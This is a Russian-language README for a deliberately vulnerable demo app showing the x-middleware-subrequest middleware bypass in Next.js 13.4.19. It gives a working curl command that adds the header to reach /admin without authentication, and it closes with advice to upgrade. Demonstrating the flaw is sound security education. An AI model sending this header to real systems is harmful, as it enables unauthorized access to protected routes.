
Это приложение демонстрирует уязвимость x-middleware-subrequest в Next.js 13.4.19, которая позволяет обходить защиту middleware.
npm install
npm run dev
Приложение имеет страницу администратора по адресу /admin, которая должна быть защищена middleware. Однако она доступна без аутентификации при использовании заголовка x-middleware-subrequest.
/admin - Вы будете перенаправлены на /login/adminЧтобы обойти аутентификацию, вы можете использовать curl или любой HTTP-клиент для отправки запроса с заголовком x-middleware-subrequest:
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
Эта уязвимость демонстрирует, как можно обойти защиту middleware в Next.js 13.4.19 с помощью заголовка x-middleware-subrequest. В производственной среде это может позволить неавторизованный доступ к защищенным маршрутам.
Чтобы исправить эту уязвимость, обновитесь до новой версии Next.js, в которой эта проблема была устранена.